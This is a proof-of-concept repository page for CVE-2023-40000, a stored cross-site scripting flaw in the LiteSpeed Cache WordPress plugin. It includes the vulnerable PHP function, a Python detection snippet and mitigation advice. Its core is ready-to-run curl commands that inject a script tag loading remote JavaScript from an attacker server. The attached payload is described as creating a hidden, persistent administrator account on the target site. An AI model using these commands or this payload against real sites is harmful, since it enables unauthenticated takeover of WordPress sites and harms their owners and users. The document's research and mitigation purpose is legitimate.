PoC details: aa7282ed0de99ab2950dc5221c00c6d45d077025

Source
Related vulnerability
Title: WordPress Plugin LiteSpeed Cache cross-site scripting vulnerability (CVE-2023-40000)
Description: WordPress and WordPress plugins are products of the WordPress Foundation. WordPress is a blogging platform written in PHP that lets users host a personal blog on a server running PHP and MySQL; a WordPress plugin is an add-on application for it. WordPress Plugin LiteSpeed Cache 5.7 and earlier contain a cross-site scripting vulnerability caused by missing sanitization of user-supplied input.
Description
PoC for XSS vulnerability in the LiteSpeed Cache WordPress plugin (CVE-2023-40000) allowing elevated privileges. Includes code, explanations, and mitigations.
Introduction
# LiteSpeed Cache XSS PoC

PoC for XSS vulnerability in the LiteSpeed Cache WordPress plugin allowing elevated privileges. This vulnerability was fixed in version **5.7.0.1** of the plugin, and was assigned [CVE-2023-40000](https://www.cve.org/CVERecord?id=CVE-2023-40000). According to [the plugin's advanced view page](https://wordpress.org/plugins/litespeed-cache/advanced/), about 35% of users are still using a vulnerable version (<5.7.0.1), which adds up to about 1.8M websites.

## Vulnerability Information

Due to a lack of input sanitization in the `update_cdn_status` function, unauthenticated users can send a POST request with a malicious `_msg` form value that is stored and later rendered in the WordPress admin area. This lets anyone create admin accounts, escalate privileges, or steal sensitive information with a single unauthenticated POST request. The vulnerable function can be found [here](https://github.com/litespeedtech/lscache_wp/blob/v5.5/src/cdn-setup.cls.php#L49-L69) or below, and the `Admin_Display::error` function can be found [here](https://github.com/litespeedtech/lscache_wp/blob/2564cb05b6ba33fbf86fbcb62699dc5d3e28c9ae/src/admin-display.cls.php#L376-L385).

```php
/**
 * Callback for updating Auto CDN Setup status after run
 *
 * @since  4.7
 * @access public
 */
public function update_cdn_status() {

	if ( !isset( $_POST[ 'success' ] ) || !isset( $_POST[ 'result' ] ) ) {
		self::save_summary( array( 'cdn_setup_err' => __( 'Received invalid message from the cloud server. Please submit a ticket.', 'litespeed-cache' ) ) );
		return self::err( 'lack_of_param' );
	}
	if (!$_POST[ 'success' ]) {
		// Vulnerable: the attacker-controlled '_msg' value is stored as-is
		// and then passed to Admin_Display::error, which renders it in wp-admin.
		self::save_summary( array( 'cdn_setup_err' => $_POST[ 'result' ][ '_msg' ] ) );
		Admin_Display::error( __( 'There was an error during CDN setup: ', 'litespeed-cache' ) . $_POST[ 'result' ][ '_msg' ] );
	} else {
		$this->_process_cdn_status($_POST[ 'result' ]);
	}

	return self::ok();
}
```
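The request shape described above (an unauthenticated POST to the `cdn_status` REST route with `success=0` and markup in `result[_msg]`) is easy to spot at a reverse proxy or WAF. The following is an added detection example, not code from the PoC repository or the plugin; the hostnames, the sample requests and the idea that the proxy hands us method, URL and raw form body are assumptions. It also covers the `?rest_route=` fallback WordPress accepts when pretty permalinks are disabled.

```python
from urllib.parse import parse_qs, urlparse
import re

# REST route registered by the plugin for the vulnerable callback.
CDN_STATUS_ROUTE = "/litespeed/v1/cdn_status"
# Any tag opener such as "<script", "</div" or "<!--"; a plain-text CDN
# status message from the cloud server never needs one.
TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z!]")


def targets_cdn_status(url: str) -> bool:
    """True if the URL hits the cdn_status route, either via /wp-json/...
    or via the ?rest_route=... fallback WordPress offers without pretty permalinks."""
    parsed = urlparse(url)
    if parsed.path.endswith("/wp-json" + CDN_STATUS_ROUTE):
        return True
    return parse_qs(parsed.query).get("rest_route", [""])[0] == CDN_STATUS_ROUTE


def inspect_request(method: str, url: str, body: str) -> dict:
    """Classify one request; body is the raw x-www-form-urlencoded payload."""
    if method.upper() != "POST" or not targets_cdn_status(url):
        return {"flag": False, "reason": "not the cdn_status route", "msg": ""}
    form = parse_qs(body, keep_blank_values=True)
    success = form.get("success", [""])[0]
    msg = form.get("result[_msg]", [""])[0]
    # The unsanitized branch only runs when 'success' is falsy; markup in
    # '_msg' there is what gets stored and later echoed inside wp-admin.
    if success in ("", "0") and TAG_RE.search(msg):
        return {"flag": True, "reason": "markup in result[_msg] on error branch", "msg": msg}
    return {"flag": False, "reason": "plain-text cdn_status callback", "msg": msg}


# Constructed sample traffic: two exploitation attempts, one legitimate
# error callback, and one GET that never reaches the vulnerable code.
SAMPLE_REQUESTS = [
    ("POST", "https://site.example/wp-json/litespeed/v1/cdn_status",
     "success=0&result[_msg]=%3Cscript+src%3Dhttps%3A%2F%2Fyour.server%2Fadmin-bar-reloaded.min.js%3E%3C%2Fscript%3E"),
    ("POST", "https://site.example/?rest_route=/litespeed/v1/cdn_status",
     "success=0&result[_msg]=%3Cscript%3E1%3C%2Fscript%3E"),
    ("POST", "https://site.example/wp-json/litespeed/v1/cdn_status",
     "success=0&result[_msg]=Domain+verification+failed"),
    ("GET", "https://site.example/wp-json/litespeed/v1/cdn_status", ""),
]


def scan(requests=SAMPLE_REQUESTS) -> list:
    """Return the classification of every flagged request."""
    return [r for r in (inspect_request(*req) for req in requests) if r["flag"]]
```

Flagging is only a detection aid; the actual fix is updating the plugin to 5.7.0.1 or later, where the value is sanitized before storage and display.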

## Proof of Concept

The proof of concept in this repository contains a Node.js Express server designed to obfuscate and deliver the XSS payload while also capturing incoming pings and data. The payload script showcases what an attacker exploiting this vulnerability could do: it creates an admin account with the username "wp-config-user" and password "somepassword123". The XSS payload, which is disguised as `admin-bar-reloaded.min`, hides the initial XSS popup on load, completely hides the created user in the `users.php` admin page, and repeats the initial POST request to maintain a persistent stored XSS.

### Installation and Usage

1. Install Node.js and npm if they are not already installed.
2. Clone the repository and navigate into the project directory.
3. Run `npm install` to install the dependencies.
4. Start the server with `node index.js`.

### Sending the POST Request

Use the following cURL command to send the POST request to the vulnerable endpoint:

#### Linux:

```bash
curl -X POST "https://target.website/wordpress/wp-json/litespeed/v1/cdn_status" \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "success=0&result[_msg]=<script src=https://your.server/admin-bar-reloaded.min.js></script>"
```

#### Windows:

```cmd
curl -X POST "https://target.website/wordpress/wp-json/litespeed/v1/cdn_status" ^
-H "Content-Type: application/x-www-form-urlencoded" ^
-d "success=0&result[_msg]=<script src=https://your.server/admin-bar-reloaded.min.js></script>"
```

## Disclaimer

The contents of this repository are provided strictly for educational and research purposes. I am not responsible for any misuse or illegal activities stemming from the use of this proof of concept. On top of this, a warning has been issued on the LiteSpeed Cache plugin page advising all users to update their software due to this known vulnerability. Please ensure your installations are updated to version 5.7.0.1 or later to mitigate this issue.
File snapshot

```text
[4.0K] /data/pocs/aa7282ed0de99ab2950dc5221c00c6d45d077025
├── [2.6K] index.js
├── [1.0K] LICENSE
├── [ 338] package.json
├── [ 53K] package-lock.json
├── [3.8K] payload.js
└── [3.9K] README.md

0 directories, 6 files
```